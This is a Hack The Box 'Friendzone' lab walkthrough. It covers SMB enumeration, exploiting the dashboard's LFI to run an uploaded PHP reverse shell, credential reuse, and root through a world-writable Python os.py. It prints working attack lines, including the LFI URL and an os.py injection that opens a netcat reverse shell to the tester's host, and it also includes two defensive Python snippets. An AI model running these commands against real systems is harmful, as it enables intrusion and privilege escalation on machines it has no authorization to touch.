HTB – Friendzone

Let’s start off by scanning the target with nmap to check which ports are open.

c:\PENTEST>nmap -sC -sV 10.10.10.123
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-30 14:58 W. Europe Summer Time
Stats: 0:00:38 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.79% done; ETC: 14:58 (0:00:00 remaining)
Stats: 0:00:54 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.79% done; ETC: 14:58 (0:00:00 remaining)
Nmap scan report for administrator1.friendzone.red (10.10.10.123)
Host is up (0.016s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: FriendZone Corp Administrator login page
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h00m36s, deviation: 1h43m54s, median: -37s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2019-08-30T15:57:54+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-08-30 14:57:53
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.62 seconds

c:\PENTEST>

Enumeration

Browsing to the vulnerable machine’s IP address, we are welcomed by the web page shown below.

Here I also notice the domain friendzone.red, which could be a clue for proceeding further. The nmap result shows port 53 open on TCP, so a DNS zone transfer may be possible.

I didn’t find any other useful information on the home page, so I tried to enumerate web directories with DIRB. That was not worthwhile either: nothing in the enumerated result turned out to be valuable on closer inspection.

Consequently, I switched to another enumeration technique: null-session SMB enumeration. With the help of SMBMap, a Linux utility, we try to list the SMB shares.

root@kali:~/htb# smbmap -H 10.10.10.123 -r
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.123...
[+] IP: 10.10.10.123:445	Name: 10.10.10.123                                      
	Disk                                                  	Permissions
	----                                                  	-----------
	print$                                            	NO ACCESS
	Files                                             	NO ACCESS
	general                                           	READ ONLY
	./                                                 
	dr--r--r--                0 Wed Jan 16 15:10:51 2019	.
	dr--r--r--                0 Wed Jan 23 16:51:02 2019	..
	fr--r--r--               57 Tue Oct  9 19:52:42 2018	creds.txt
	Development                                       	READ, WRITE
	./                                                 
	dr--r--r--                0 Fri Aug 30 09:04:55 2019	.
	dr--r--r--                0 Wed Jan 23 16:51:02 2019	..
	fr--r--r--             5492 Thu Aug 29 08:04:05 2019	php-reverse-shell.php
	IPC$                                              	NO ACCESS
root@kali:~/htb#

I found two accessible shares: general is read-only and Development has both read and write permissions. When we accessed the general share, we obtained a text file named creds.txt.

This file contains the following credential, which could be useful later.

admin:WORKWORKHhallelujah@#

Next, I added administrator1.friendzone.red to the /etc/hosts file so that this domain can be resolved.

Browsing to administrator1.friendzone.red gives a login portal, where I submitted the credential found above.

This revealed another hint, “/dashboard.php”, a further web directory.

Opening /dashboard.php gave the following web page, with the message “image_name param is missing”.

Therefore we supplied “default is image_id=a.jpg&pagename=timestamp” in the URL and obtained the following web page, on which we notice a timestamp; a pagename parameter that selects what is displayed looked a little suspicious, pointing towards LFI.

Exploiting LFI

To confirm this, I tried calling timestamp.php directly; obtaining the same timestamp on screen confirmed that the page is vulnerable to LFI. Now let’s extend the LFI to RCE to obtain a shell on the host machine.
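The dashboard’s pagename parameter is what turned an ordinary include into an LFI. As an added example, not code from the original post or from the FriendZone box (whose dashboard is written in PHP), here is the same page-selection logic in Python with the check a defender would want: the requested name must be a bare identifier on an explicit allowlist, and the resolved path must still sit inside a fixed pages directory, so absolute paths, traversal sequences and paths into an SMB share are all rejected. The base directory and the allowed page names are assumptions for the illustration.

```python
import posixpath

# Constructed for the example: the directory that holds legitimate dashboard pages
PAGES_DIR = "/var/www/admin/pages"
# Explicit allowlist of page names the dashboard may include (assumption)
ALLOWED_PAGES = {"timestamp", "welcome"}


def vulnerable_page_path(pagename):
    """Mirrors the behaviour observed in the write-up: the user-supplied value is
    concatenated into an include path without validation, so any readable file
    (including one dropped on a writable SMB share) can be included."""
    return pagename + ".php"


def safe_page_path(pagename):
    """Return the absolute path of the page to include, or None if the request
    is rejected.  The name must be a plain identifier on the allowlist, and the
    resolved path must remain inside PAGES_DIR."""
    if not isinstance(pagename, str) or not pagename:
        return None
    # Reject anything that is not a bare page name: separators, NUL bytes, dotfiles
    if "/" in pagename or "\\" in pagename or "\x00" in pagename or pagename.startswith("."):
        return None
    if pagename not in ALLOWED_PAGES:
        return None
    candidate = posixpath.normpath(posixpath.join(PAGES_DIR, pagename + ".php"))
    # Defence in depth: confirm normalisation did not escape the base directory
    if posixpath.commonpath([PAGES_DIR, candidate]) != PAGES_DIR:
        return None
    return candidate


if __name__ == "__main__":
    samples = [
        "timestamp",
        "../../etc/passwd",
        "/etc/Development/php-reverse-shell",
        "dashboard",
    ]
    for name in samples:
        print("%-40s vulnerable=%-45s safe=%s"
              % (name, vulnerable_page_path(name), safe_page_path(name)))
```

The allowlist is the real control here; the commonpath check only guards against a future change that relaxes the name validation.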

Since we know that Development is the only share with both read and write permissions, we can place our malicious file in that share and execute the backdoor through the LFI to obtain a reverse connection.

I used pentestmonkey’s PHP reverse shell, with small modifications ($lhost and $lport), as the backdoor to be placed on the host machine.

So we connect to SMB with smbclient and upload php-reverse-shell.php into the Development share. At the same time we start a netcat listener in a new terminal to catch the reverse connection from the host machine.

Then we execute the uploaded PHP backdoor through the LFI, as shown below:

https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=/etc/Development/php-reverse-shell

As soon as we open the above URL in the browser we get a netcat session. To obtain a proper shell we use the Python pty one-liner, and we find our first flag in /home/friend.

C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
connect to [10.10.14.12] from administrator1.friendzone.red [10.10.10.123] 49888
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
15:25:48 up 17:31, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@FriendZone:/$ pwd
pwd
/
www-data@FriendZone:/$ cat /home/friend/user.txt
cat /home/friend/user.txt
a9e*****a11
www-data@FriendZone:/$ cd /var/www
cd /var/www
www-data@FriendZone:/var/www$ ls
ls
admin       friendzoneportal       html             uploads
friendzone  friendzoneportaladmin  mysql_data.conf
www-data@FriendZone:/var/www$ cat mysql_data.conf
cat mysql_data.conf
for development process this is the mysql creds for user friend

db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ

www-data@FriendZone:/var/www$


Privilege Escalation

With the credentials enumerated above we try SSH, and luckily we get in. We then look for weak file permissions or a role that would let us escalate privileges to a root shell or the root flag.

C:\Users\jacco>ssh friend@10.10.10.123
friend@10.10.10.123's password: Agpyu12!0.213$
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$ cd /tmp
friend@FriendZone:/tmp$ ls
systemd-private-22dff15053e947a595068d3196c0fb1f-apache2.service-KTH0XF
systemd-private-22dff15053e947a595068d3196c0fb1f-systemd-resolved.service-efnbiY
systemd-private-22dff15053e947a595068d3196c0fb1f-systemd-timesyncd.service-arbkWm
vmware-root_243-2125741226
friend@FriendZone:/tmp$ wget http://10.10.14.12/pspy64
--2019-08-30 15:39:18-- http://10.10.14.12/pspy64
Connecting to 10.10.14.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64 100%[=================================================>] 2.94M 6.73MB/s in 0.4s

2019-08-30 15:39:18 (6.73 MB/s) - ‘pspy64’ saved [3078592/3078592]

friend@FriendZone:/tmp$ chmod 777 pspy64
friend@FriendZone:/tmp$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


--pspy banner snipped--

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2019/08/30 15:40:50 CMD: UID=0 PID=98 |
2019/08/30 15:40:50 CMD: UID=0 PID=9 |
2019/08/30 15:40:50 CMD: UID=0 PID=89 |
2019/08/30 15:40:50 CMD: UID=0 PID=859 | /usr/sbin/smbd --foreground --no-process-group
2019/08/30 15:40:50 CMD: UID=0 PID=857 | /usr/sbin/smbd --foreground --no-process-group
2019/08/30 15:40:50 CMD: UID=0 PID=856 | /usr/sbin/smbd --foreground --no-process-group
2019/08/30 15:40:50 CMD: UID=107 PID=853 | /usr/sbin/exim4 -bd -q30m
2019/08/30 15:40:50 CMD: UID=0 PID=85 |
--snip--
2019/08/30 15:40:50 CMD: UID=0 PID=10 |
2019/08/30 15:40:50 CMD: UID=0 PID=1 | /sbin/init splash
2019/08/30 15:42:01 CMD: UID=0 PID=14751 | /bin/sh -c /opt/server_admin/reporter.py
2019/08/30 15:42:01 CMD: UID=0 PID=14750 | /bin/sh -c /opt/server_admin/reporter.py
2019/08/30 15:42:01 CMD: UID=0 PID=14749 | /usr/sbin/CRON -f
^CExiting program... (interrupt)
friend@FriendZone:/tmp$

Running pspy64, we notice a Python script being executed by root, which surprised us.

So I decided to take a look at what this script was doing and used cat to read it. Apart from importing the Python library os, the script performs no useful operation, so I took advantage of that import for privilege escalation.

friend@FriendZone:/tmp$ cat /opt/server_admin/reporter.py
#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer
friend@FriendZone:/tmp$

Taking advantage of the Python import, we can modify the world-writable os.py library so that, when root’s cron job imports it, it copies the root flag into a file we can read.

friend@FriendZone:/tmp$ ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25952 Aug 30 15:47 /usr/lib/python2.7/os.py
friend@FriendZone:/tmp$ echo "system ('cat /root/root.txt > /tmp/flag')" >> /usr/lib/python2.7/os.py
friend@FriendZone:/tmp$ ls
flag
pspy64
systemd-private-22dff15053e947a595068d3196c0fb1f-apache2.service-KTH0XF
systemd-private-22dff15053e947a595068d3196c0fb1f-systemd-resolved.service-efnbiY
systemd-private-22dff15053e947a595068d3196c0fb1f-systemd-timesyncd.service-arbkWm
vmware-root_243-2125741226
friend@FriendZone:/tmp$ cat flag
b0e*****90c7
friend@FriendZone:/tmp$

Alternatively, to catch a root shell:
friend@FriendZone:/usr/lib/python2.7$ echo "import os
> os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 9876 >/tmp/f')" >> os.py


C:\Users\jacco>nc -lvp 9876
listening on [any] 9876 ...
connect to [10.10.14.12] from administrator1.friendzone.red [10.10.10.123] 59782
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
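The root cause on this box is a root cron job that imports a Python module from a file anyone can modify (the -rwxrwxrwx on /usr/lib/python2.7/os.py). As an added example, not code from the original post, here is a small audit script that walks an interpreter’s module search path and flags modules or directories that a non-root user could modify; it goes slightly beyond the single file on the box by also checking directories, since a writable directory lets a new module be dropped even when the existing files are safe. The decision logic is kept in is_hijackable() so it can be checked without touching the filesystem; the path list and the sample modes are assumptions for the illustration.

```python
import os
import stat
import sys

ROOT_UID = 0


def is_hijackable(mode, uid):
    """Decide whether a file or directory on the import path could be modified
    by an unprivileged user: it is owned by a non-root account, or it carries
    the group- or world-writable bit.  mode is a raw st_mode value."""
    if uid != ROOT_UID:
        return True
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_import_path(paths):
    """Return a list of (path, permission string, uid) for every directory and
    every .py/.pyc/.so module under the given search-path entries that
    is_hijackable() flags.  Symlinks are skipped; their targets are reached
    when the target directory itself is on the path."""
    findings = []
    for entry in paths:
        if not entry or not os.path.isdir(entry):
            continue
        for dirpath, _dirnames, filenames in os.walk(entry):
            # "" stands for the directory itself, checked before its modules
            names = [""] + [f for f in filenames if f.endswith((".py", ".pyc", ".so"))]
            for name in names:
                target = os.path.join(dirpath, name) if name else dirpath
                try:
                    st = os.lstat(target)
                except OSError:
                    continue
                if stat.S_ISLNK(st.st_mode):
                    continue
                if is_hijackable(st.st_mode, st.st_uid):
                    findings.append((target, stat.filemode(st.st_mode), st.st_uid))
    return findings


if __name__ == "__main__":
    # Audits the interpreter running this script; to audit the one a cron job
    # uses (python2.7 on the box), run it with that interpreter or pass its
    # search path explicitly, e.g. audit_import_path(["/usr/lib/python2.7"]).
    for path, perms, uid in audit_import_path(sys.path):
        print("%s uid=%d %s" % (perms, uid, path))
```

Run as root on a schedule (or from the same cron that runs the privileged script) and alert on any finding; on the box the os.py entry would have appeared as `-rwxrwxrwx uid=0 /usr/lib/python2.7/os.py`.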

Credits to : https://www.hackingarticles.in/hack-the-box-friendzone-walkthrough/

Author: Jacco Straathof
